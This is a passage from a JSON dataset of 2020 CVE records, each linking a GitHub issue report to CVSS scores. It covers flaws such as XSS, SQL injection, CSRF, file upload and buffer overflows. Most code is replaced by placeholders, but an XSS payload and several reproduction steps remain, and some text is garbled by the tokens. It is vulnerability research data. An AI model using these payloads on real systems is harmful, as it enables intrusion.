        "Issue_Url_new": "https://github.com/gin-gonic/gin/issues/2473",
        "Repo_new": "gin-gonic/gin",
        "Issue_Created_At": "2020-08-20T11:40:37Z",
        "description": "X Forwarded For handling is unsafe. URLTAG If Gin is exposed directly to the internet, a client can easily spoof its client IP by simply setting an X Forwarded For header. The correct way to handle this is to require a list of trusted proxies to be configured. If unset, X Forwarded For should be ignored. I filed a similar issue against Cloud Foundry's gorouter a few years ago. cloudfoundry/gorouter NUMBERTAG In case that repo should migrate elsewhere, I'm copying the contents of the report in its entirety here: Issue X Forwarded For is passed through unfiltered, allowing anyone to spoof their origin IP. Context X Forwarded For records the path a given request has taken. The first IP is the origin client, each subsequent IP denotes a path along the way (proxies, load balancers, whatever). It's the only way for a backend service to determine the original IP, since the incoming connection is from the gorouter. However, blindly trusting the header obviously allows anyone to spoof the origin IP. Common ways to address this security problem is to only trust X Forwarded For headers from trusted sources. Examples of how to mitigate this problem: URLTAG URLTAG Steps to Reproduce Pass a X Forwarded For header with someone else's IP (e.g NUMBERTAG in it to your application, and it'll appear as though that's where the request came from. Expected result Since I'm not a trusted client, my X Forwarded For header should have been discarded, and my IP should be the first in the X Forwarded For header received by the backend. Current result The backend service will see an X Forwarded For header reading NUMBERTAG my real IP], [gorouter IP]\" (possibly more, if there's a load balancer or something in the path). It will think the request came from NUMBERTAG Possible Fix Allow specifying a list of IPs (or CIDR's) of trusted proxies and load balancers. If the request didn't come from one of them, discard the X Forwarded For. For bonus points, do what nginx does: Go through the list (starting from the last entry) and check each entry to see if it's the list of trusted proxies. When one is encountered that's not on the list, discard everything before it. All of the above also applies to X Forwarded Proto. We shouldn't trust people to say that their request was ever HTTPS if it never was.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 4.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-28483",
        "Issue_Url_old": "https://github.com/gin-gonic/gin/issues/2232",
        "Issue_Url_new": "https://github.com/gin-gonic/gin/issues/2232",
        "Repo_new": "gin-gonic/gin",
        "Issue_Created_At": "2020-02-11T23:31:35Z",
        "description": "X Forwarded For header should be processed last to first to prevent IP spoofing. Description APITAG header should be processed last to first to prevent IP spoofing, as explained in this post URLTAG . It would be needed to set up IP addresses of known proxies to be ignored. Current implementation In FILETAG : CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 4.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-28487",
        "Issue_Url_old": "https://github.com/visjs/vis-timeline/issues/838",
        "Issue_Url_new": "https://github.com/visjs/vis-timeline/issues/838",
        "Repo_new": "visjs/vis-timeline",
        "Issue_Created_At": "2020-12-18T11:09:53Z",
        "description": "APITAG Site Scripting (XSS). > APITAG Site Scripting (XSS) > > APITAG Site Scripting (XSS) allows clients to inject > arbitrary scripting code into application and have the server return > the script to the client in the response. This occurs because the > application is taking untrusted data and storing it without > performing any validation or output encoding. > > Reference: > FILETAG > > Steps to Reproduce: > > An example Proof Of Concept can be seen here: > URLTAG if user input is taken as a > content field (which could be the case where applications will be > using vis as a Dependency), this could result in a user injecting > malicious APITAG which will be rendered by a user. In the above > APITAG example, this is demonstrated by the insertion of<img > src='xxx' onerror='alert(/XSS/);' />. > > We wanted to know your opinion regarding this issue. I believe the > core issue here is URLTAG not validating > user input. I also believe other vis modules are affected. But I > wanted to hear your opinion on whether you think this is a security > issue or not. Do let me know what you think. Thanks.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 4.7,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2020-28491",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-dataformats-binary/issues/186",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-dataformats-binary/issues/186",
        "Repo_new": "fasterxml/jackson-dataformats-binary",
        "Issue_Created_At": "2019-10-17T01:59:37Z",
        "description": "[cbor] Unchecked stack allocation of byte buffer can cause ERRORTAG exception. APITAG APITAG accepts an unchecked field string length value discovered during parsing, and is used to size a stack allocated buffer. A malicious payload can be fabricated to exploit this and (at least) cause a ERRORTAG exception. ERRORTAG I am not sure how serious this is in java. With an unmanaged runtime this would be critical security vulnerability. For example, the following CBOR data (discovered by a fuzzer) leads to len NUMBERTAG and triggers this exception on my laptop. APITAG This can probably be addressed by simple sanity checking of the len value (non negative, some max limit). Also consider moving b to the heap if it does not create a performance issue.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28496",
        "Issue_Url_old": "https://github.com/mrdoob/three.js/issues/21132",
        "Issue_Url_new": "https://github.com/mrdoob/three.js/issues/21132",
        "Repo_new": "mrdoob/three.js",
        "Issue_Created_At": "2021-01-23T10:11:12Z",
        "description": "APITAG in three. APITAG Hi, I would like to report a Regular Expression Denial of Service APITAG vulnerability in three. It allows cause a denial of service when handling rgb or hsl colors. The vulnerable regex is located in URLTAG To Reproduce Steps to reproduce the behavior: Code ERRORTAG I am willing to suggest that you replace the regex APITAG with APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28638",
        "Issue_Url_old": "https://github.com/dyne/Tomb/issues/385",
        "Issue_Url_new": "https://github.com/dyne/tomb/issues/385",
        "Repo_new": "dyne/tomb",
        "Issue_Created_At": "2020-11-03T12:21:20Z",
        "description": "[security] Any password unlocks tomb when using pinentry curses on APITAG Thank you for this tool. I've been using it for a while, and I appreciate its straightforwardness. I recently noticed that my tomb unlocks no matter what password is provided. Steps to reproduce NUMBERTAG Use tomb with pinentry curses in the $PATH NUMBERTAG Run APITAG NUMBERTAG Provide any password for APITAG NUMBERTAG Provide any password for APITAG NUMBERTAG Provide any password for APITAG (!!!) My operating system is APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28693",
        "Issue_Url_old": "https://github.com/ttimot24/HorizontCMS/issues/21",
        "Issue_Url_new": "https://github.com/ttimot24/horizontcms/issues/21",
        "Repo_new": "ttimot24/horizontcms",
        "Issue_Created_At": "2020-11-05T06:43:07Z",
        "description": "An unrestricted file upload through Themes upload function. Themes upload function will allow uploading zip file and extract content to /themes/ directory. If attacker send a zip file contain malicious php, they can executing the PHP file with URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-28702",
        "Issue_Url_old": "https://github.com/tomoya92/pybbs/issues/137",
        "Issue_Url_new": "https://github.com/atjiu/pybbs/issues/137",
        "Repo_new": "atjiu/pybbs",
        "Issue_Created_At": "2020-11-05T05:58:18Z",
        "description": "SQL injection vulnerability in version NUMBERTAG Official website of the manufacturer involved: URLTAG Source code download address: URLTAG Framework version NUMBERTAG ulnerability type: SQL injection Vulnerability status: not fixed Vulnerability level: high Code analysis and vulnerability recurrence\uff1a As can be seen from screenshot below(see the upper left mark of Figure NUMBERTAG for the detailed code path), the \"$\" symbol is used in the SQL statement in line NUMBERTAG of the code, resulting in a possible SQL injection vulnerability. From this SQL section, we trace back to the interface functions, and then we find that the SQL section is the topic query SQL of the user's main interface. FILETAG There is no front end filtering operation in the input box, and the existence of the vulnerability can be verified manually. Start the project, log in the front end after registering users, create a new topic with the content of NUMBERTAG and the title of \"test\", and then enter NUMBERTAG in the search bar, and no data can be APITAG enter NUMBERTAG or NUMBERTAG including spaces) , proving that there is a SQL injection vulnerability. FILETAG FILETAG FILETAG Here is the result of sqlmap\uff1a FILETAG FILETAG Here is the packet content\uff1a FILETAG GET /search?keyword NUMBERTAG HTTP NUMBERTAG Host: localhost NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Connection: close Referer: URLTAG Cookie: Idea NUMBERTAG cb NUMBERTAG cbcaa eb NUMBERTAG b NUMBERTAG f2fea NUMBERTAG b NUMBERTAG APITAG APITAG APITAG user_token=b8c NUMBERTAG e NUMBERTAG b7d bb NUMBERTAG e NUMBERTAG a0d0f NUMBERTAG Upgrade Insecure Requests NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28705",
        "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/576",
        "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/576",
        "Repo_new": "daylightstudio/fuel-cms",
        "Issue_Created_At": "2020-11-05T02:54:39Z",
        "description": "FUEL CMS NUMBERTAG Cross site request forgery (CSRF) vulnerability. In PATHTAG Cross site request forgery (CSRF) vulnerability The Attacker can use this vulnerability to delete random pages! APITAG POC CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-28734",
        "Issue_Url_old": "https://github.com/plone/Products.CMFPlone/issues/3209",
        "Issue_Url_new": "https://github.com/plone/products.cmfplone/issues/3209",
        "Repo_new": "plone/products.cmfplone",
        "Issue_Created_At": "2020-11-10T09:41:27Z",
        "description": "Security issues in the background. Hi, I found several security issues in the background, please pay attention to deal with it address: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-28759",
        "Issue_Url_old": "https://github.com/OAID/Tengine/issues/476",
        "Issue_Url_new": "https://github.com/oaid/tengine/issues/476",
        "Repo_new": "oaid/tengine",
        "Issue_Created_At": "2020-11-11T07:31:30Z",
        "description": "A buffer overflow is found in serializer. Vulnerability analysis We found that in the seriliazer module, there is a heap overflow problem Link\uff1a FILETAG The problem is in the APITAG function starting at line NUMBERTAG which calls the APITAG function at line NUMBERTAG img URLTAG The first parameter APITAG of the APITAG function points to the address space where the model file is located, and the second parameter is controlled by APITAG . For this project, the model is an input controlled by the user, so the parameters of APITAG can be controlled. img URLTAG img URLTAG Poc Download the official example model, and select the landmark model to demonstrate here. According to the official use case, the landmark model is run normally, and the program executes normally. img URLTAG Write NUMBERTAG bytes of garbage data to the header of the APITAG file, and then run the landmark model. Program routine error. img URLTAG Write NUMBERTAG bytes of garbage data to the header of the APITAG file, and then run the landmark model. program crash. img URLTAG EXP\uff1a CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-28846",
        "Issue_Url_old": "https://github.com/wh1tes/wh1te_blog/issues/8",
        "Issue_Url_new": "https://github.com/wh1tes/wh1te_blog/issues/8",
        "Repo_new": "wh1tes/wh1te_blog",
        "Issue_Created_At": "2020-11-12T09:43:53Z",
        "description": "CSRF vulnerability exist in seacms NUMBERTAG CSRF vulnerability exist in seacms NUMBERTAG Github Url: URLTAG Official website: FILETAG Through code audit, we found that there was no prevention of CSRF when the account was added in the administrator background. The key code is in APITAG FILETAG By analysis,We can confirm that there is a vulnerability here. Check Point:We forged a web page FILETAG FILETAG CODETAG And we input some String: FILETAG As result,we can found the user is added in background. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-28847",
        "Issue_Url_old": "https://github.com/xCss/Valine/issues/348",
        "Issue_Url_new": "https://github.com/xcss/valine/issues/348",
        "Repo_new": "xcss/valine",
        "Issue_Created_At": "2020-11-11T14:00:20Z",
        "description": "FILETAG [ ] APITAG Which versions of Valine, and which browser / OS are affected by this issue? Valine NUMBERTAG All systems and browsers",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-28851",
        "Issue_Url_old": "https://github.com/golang/go/issues/42535",
        "Issue_Url_new": "https://github.com/golang/go/issues/42535",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2020-11-12T11:07:01Z",
        "description": "text/language: panic in APITAG while parsing u extension. APITAG What version of Go are you using ( go version )? APITAG $ go version go version APITAG linux/amd NUMBERTAG APITAG Does this issue reproduce with the latest release? What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env GO NUMBERTAG MODULE=\"\" GOARCH=\"amd NUMBERTAG GOBIN=\"\" PATHTAG PATHTAG GOEXE=\"\" GOFLAGS=\"\" GOHOSTARCH=\"amd NUMBERTAG GOHOSTOS=\"linux\" GOINSECURE=\"\" PATHTAG GONOPROXY=\"\" GONOSUMDB=\"\" GOOS=\"linux\" PATHTAG GOPRIVATE=\"\" GOPROXY=\" URLTAG \" PATHTAG APITAG GOTMPDIR=\"\" PATHTAG GCCGO=\"gccgo\" AR=\"ar\" CC=\"gcc\" CXX=\"g++\" CGO_ENABLED NUMBERTAG GOMOD=\"\" CGO_CFLAGS=\" g O2\" CGO_CPPFLAGS=\"\" CGO_CXXFLAGS=\" g O2\" CGO_FFLAGS=\" g O2\" CGO_LDFLAGS=\" g O2\" PKG_CONFIG=\"pkg config\" GOGCCFLAGS=\" fPIC m NUMBERTAG pthread fmessage length NUMBERTAG PATHTAG gno record gcc switches\" PATHTAG version: go version APITAG linux/amd NUMBERTAG PATHTAG tool compile V: compile version APITAG uname sr: Linu NUMBERTAG microsoft standard Distributor ID: Kali Description: Kali APITAG Rolling Release NUMBERTAG Codename: kali rolling PATHTAG GNU C Library APITAG GLIBC NUMBERTAG stable release version NUMBERTAG gdb version: GNU gdb APITAG NUMBERTAG APITAG APITAG What did you do? APITAG URLTAG What did you expect to see? Error via return value What did you see instead? ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28852",
        "Issue_Url_old": "https://github.com/golang/go/issues/42536",
        "Issue_Url_new": "https://github.com/golang/go/issues/42536",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2020-11-12T11:12:42Z",
        "description": "text/language: panic in APITAG while processing bcp NUMBERTAG tag. APITAG What version of Go are you using ( go version )? APITAG $ go version go version APITAG linux/amd NUMBERTAG APITAG Does this issue reproduce with the latest release? What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env GO NUMBERTAG MODULE=\"\" GOARCH=\"amd NUMBERTAG GOBIN=\"\" PATHTAG PATHTAG GOEXE=\"\" GOFLAGS=\"\" GOHOSTARCH=\"amd NUMBERTAG GOHOSTOS=\"linux\" GOINSECURE=\"\" PATHTAG GONOPROXY=\"\" GONOSUMDB=\"\" GOOS=\"linux\" PATHTAG GOPRIVATE=\"\" GOPROXY=\" URLTAG \" PATHTAG APITAG GOTMPDIR=\"\" PATHTAG GCCGO=\"gccgo\" AR=\"ar\" CC=\"gcc\" CXX=\"g++\" CGO_ENABLED NUMBERTAG GOMOD=\"\" CGO_CFLAGS=\" g O2\" CGO_CPPFLAGS=\"\" CGO_CXXFLAGS=\" g O2\" CGO_FFLAGS=\" g O2\" CGO_LDFLAGS=\" g O2\" PKG_CONFIG=\"pkg config\" GOGCCFLAGS=\" fPIC m NUMBERTAG pthread fmessage length NUMBERTAG PATHTAG gno record gcc switches\" PATHTAG version: go version APITAG linux/amd NUMBERTAG PATHTAG tool compile V: compile version APITAG uname sr: Linu NUMBERTAG microsoft standard Distributor ID: Kali Description: Kali APITAG Rolling Release NUMBERTAG Codename: kali rolling PATHTAG GNU C Library APITAG GLIBC NUMBERTAG stable release version NUMBERTAG gdb version: GNU gdb APITAG NUMBERTAG APITAG APITAG What did you do? APITAG URLTAG What did you expect to see? Error via return value What did you see instead? ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28865",
        "Issue_Url_old": "https://github.com/KFCFans/PowerJob/issues/99",
        "Issue_Url_new": "https://github.com/powerjob/powerjob/issues/99",
        "Repo_new": "powerjob/powerjob",
        "Issue_Created_At": "2020-11-13T13:59:47Z",
        "description": "Arbitrary password modification vulnerability. APITAG password modification vulnerability\uff09 \u5b98\u65b9\u8bd5\u7528\u5730\u5740\uff1a URLTAG NUMBERTAG test NUMBERTAG test NUMBERTAG FILETAG FILETAG NUMBERTAG FILETAG \u4fee\u6539\u7528\u6237\u5bc6\u7801\uff1a FILETAG FILETAG \u4e0d\u5b58\u5728\u8eab\u4efd\u6821\u9a8c\u7b49\u51ed\u8bc1\uff0c\u76f4\u63a5\u53ef\u4ee5\u4fee\u6539\u7528\u6237test2\u7684\u5bc6\u7801 APITAG FILETAG \u6700\u540e\u767b\u5f55\u6210\u529f\uff1a FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28924",
        "Issue_Url_old": "https://github.com/rclone/rclone/issues/4783",
        "Issue_Url_new": "https://github.com/rclone/rclone/issues/4783",
        "Repo_new": "rclone/rclone",
        "Issue_Created_At": "2020-11-18T12:13:24Z",
        "description": "Place holder issue for security issue. ...details to follow",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28948",
        "Issue_Url_old": "https://github.com/pear/Archive_Tar/issues/33",
        "Issue_Url_new": "https://github.com/pear/archive_tar/issues/33",
        "Repo_new": "pear/archive_tar",
        "Issue_Created_At": "2020-11-17T07:24:14Z",
        "description": "Multiple vulnerabilities through filename manipulation. I have submitted this to the PEAR bug tracker as well as the PEAR group mailing list, and I'm not sure if either has gone through, so opening an issue here with the hope that this is the right place for it. While auditing a separate application which uses APITAG internally, I found that APITAG is vulnerable to object injection through Phar unserialization as well as to local file overwriting by crafting the 'filename' of a file in a tar archive. Phar unserialization There was a APITAG talk by Sam Thomas on exploiting PHP's Phar metadata unserialization behavior a couple of years ago, called \"It ERRORTAG APITAG ERRORTAG APITAG ERRORTAG PATHTAG ERRORTAG /etc/passwd or /etc/shadow ERRORTAG private function APITAG ERRORTAG PATHTAG APITAG scheme://`, it most likely is a malicious file. It would be great if you could fix and also request a CVE ID? Attachments: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-28954",
        "Issue_Url_old": "https://github.com/bigbluebutton/bigbluebutton/issues/10818",
        "Issue_Url_new": "https://github.com/bigbluebutton/bigbluebutton/issues/10818",
        "Repo_new": "bigbluebutton/bigbluebutton",
        "Issue_Created_At": "2020-11-13T05:57:59Z",
        "description": "Join API should filter control characters from user's name. The join API is not filtering for control characters in user name. This can be a problem for some XML parsers.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28975",
        "Issue_Url_old": "https://github.com/scikit-learn/scikit-learn/issues/18891",
        "Issue_Url_new": "https://github.com/scikit-learn/scikit-learn/issues/18891",
        "Repo_new": "scikit-learn/scikit-learn",
        "Issue_Created_At": "2020-11-21T14:40:29Z",
        "description": "Segmentation fault on SVMLIB. Description: In Scikit learn version NUMBERTAG calling the APITAG method maliciously crafted model SVM can result in a segmentation fault. Such models can be introduced via pickle, json, or any other model permanence standard. The behaviour is triggered when one of the members of the _n_support array has a very large value, example NUMBERTAG when calling APITAG Tested environment: Ubuntu NUMBERTAG ubuntu NUMBERTAG Python NUMBERTAG default, Jul NUMBERTAG GCC NUMBERTAG on linux Numpy version NUMBERTAG APITAG NUMBERTAG APITAG to Reproduce from sklearn import svm from sklearn import datasets if __name__ == '__main__': X,y = APITAG clf = APITAG APITAG y) APITAG NUMBERTAG y_pred = APITAG Expected Results not to fail Actual Results Segmentation fault, this is a debugger trace ERRORTAG Versions System: python NUMBERTAG default, Jul NUMBERTAG GCC NUMBERTAG executable: PATHTAG machine: Linu NUMBERTAG generic NUMBERTAG with glibc NUMBERTAG Python dependencies: pip NUMBERTAG setuptools NUMBERTAG sklearn NUMBERTAG numpy NUMBERTAG scipy NUMBERTAG Cython: None pandas NUMBERTAG matplotlib NUMBERTAG joblib NUMBERTAG threadpoolctl NUMBERTAG Built with APITAG True",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-29069",
        "Issue_Url_old": "https://github.com/pwnlandia/mhn/issues/799",
        "Issue_Url_new": "https://github.com/pwnlandia/mhn/issues/799",
        "Repo_new": "pwnlandia/mhn",
        "Issue_Created_At": "2020-11-23T06:41:35Z",
        "description": "Unknow IP can let mhn web crash. At one day, my MHN Web page can not open but all service is well . So I try to find the reason and this is the reason as following. If there is one IP address not in APITAG APITAG then the ISO country code will return APITAG When the code is APITAG then the MHN Web can not generate icon path and the system will be crashed. FILETAG Code: PATHTAG FILETAG At function \"_get_flag_ip_localdb\" in line NUMBERTAG if it work it can get IP ISO Code, but if IP has no record in APITAG APITAG it will return None. Next, line NUMBERTAG can not use \"upper function\" to the IP ISO code. If the page need to show the country icon APITAG Dashboard, Attack APITAG then the page will be crashed. There is the crash log in PATHTAG FILETAG My case \"IP NUMBERTAG FILETAG Now there will log the error in PATHTAG and page can show perfectly. FILETAG FILETAG So if use a special IP address to connect honeypot, then it can do the APITAG attack\" to MHN system.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-29128",
        "Issue_Url_old": "https://github.com/petl-developers/petl/issues/526",
        "Issue_Url_new": "https://github.com/petl-developers/petl/issues/526",
        "Repo_new": "petl-developers/petl",
        "Issue_Created_At": "2020-10-02T03:56:32Z",
        "description": "Security issue. Hello, I have a security issue to report. Can you please provide a contact to report it to or instructions on how to report it? Thanks!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-29203",
        "Issue_Url_old": "https://github.com/armink/struct2json/issues/13",
        "Issue_Url_new": "https://github.com/armink/struct2json/issues/13",
        "Repo_new": "armink/struct2json",
        "Issue_Created_At": "2020-11-18T09:05:39Z",
        "description": "An unsafe operation is found in the S2J_STRUCT_GET_string_ELEMENT function. struct2json Vulnerability Analysis An unsafe operation is found in the ERRORTAG . The strcpy function is used to copy APITAG to the struct , which may cause overflow when APITAG is longer than structure defined array size. img URLTAG POC CODETAG Run: img URLTAG Suggestion Use strncpy instead of strcpy to control the length of APITAG \uff1a CODETAG After modification\uff1a img URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-29204",
        "Issue_Url_old": "https://github.com/xuxueli/xxl-job/issues/2083",
        "Issue_Url_new": "https://github.com/xuxueli/xxl-job/issues/2083",
        "Repo_new": "xuxueli/xxl-job",
        "Issue_Created_At": "2020-11-18T09:38:37Z",
        "description": "NUMBERTAG Add User Stored XSS vulnerabilities . Escape NUMBERTAG length limit. Please answer some questions before submitting your issue. Thanks! Which version of XXL JOB do you using NUMBERTAG Expected behavior Add User\u3002 Actual behavior Add User Stored XSS vulnerabilities . Escape NUMBERTAG length limit Steps to reproduce the behavior url\uff1a FILETAG FILETAG poc\uff1a APITAG FILETAG The page automatically loads and triggers XSS FILETAG FILETAG Other information Restoration suggestions\uff1a",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-29242",
        "Issue_Url_old": "https://github.com/dhowden/tag/issues/77",
        "Issue_Url_new": "https://github.com/dhowden/tag/issues/77",
        "Repo_new": "dhowden/tag",
        "Issue_Created_At": "2020-11-19T13:15:59Z",
        "description": "some vulnerability NUMBERTAG an out of bound vulnerability in APITAG function. Hello, I found some vulnerability in this respository, they are could be used to cause a denial of service via decode some evil file. This is the first vulnerability in FILETAG . In APITAG function, you don't check the size of b parameter. If the size of b is zero or less than NUMBERTAG program will happen panic. testcase FILETAG info ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-29243",
        "Issue_Url_old": "https://github.com/dhowden/tag/issues/80",
        "Issue_Url_new": "https://github.com/dhowden/tag/issues/80",
        "Repo_new": "dhowden/tag",
        "Issue_Created_At": "2020-11-19T13:44:09Z",
        "description": "some vulnerability NUMBERTAG an out of bound vulnerability in APITAG function. This is the fourth vulnerability in FILETAG . In APITAG function, you don't check the size of b parameter. If the b parameter don't end with double zero, the size of APITAG is one after APITAG and then program will happen panic beause your check logic is a little late in line NUMBERTAG testcase FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-29244",
        "Issue_Url_old": "https://github.com/dhowden/tag/issues/79",
        "Issue_Url_new": "https://github.com/dhowden/tag/issues/79",
        "Repo_new": "dhowden/tag",
        "Issue_Created_At": "2020-11-19T13:29:16Z",
        "description": "some vulnerability NUMBERTAG an out of bound vulnerability in APITAG function. This is the third vulnerability in FILETAG In APITAG function, you don't check the size of b , program will happen panic when the size of b is NUMBERTAG testcase FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-29245",
        "Issue_Url_old": "https://github.com/dhowden/tag/issues/78",
        "Issue_Url_new": "https://github.com/dhowden/tag/issues/78",
        "Repo_new": "dhowden/tag",
        "Issue_Created_At": "2020-11-19T13:24:16Z",
        "description": "some vulnerability NUMBERTAG an out of bound vulnerability in APITAG function. This is the second vulnerability in FILETAG . In APITAG function, although you check the size of b , program also will happen panic when the size of b is NUMBERTAG testcase FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-29249",
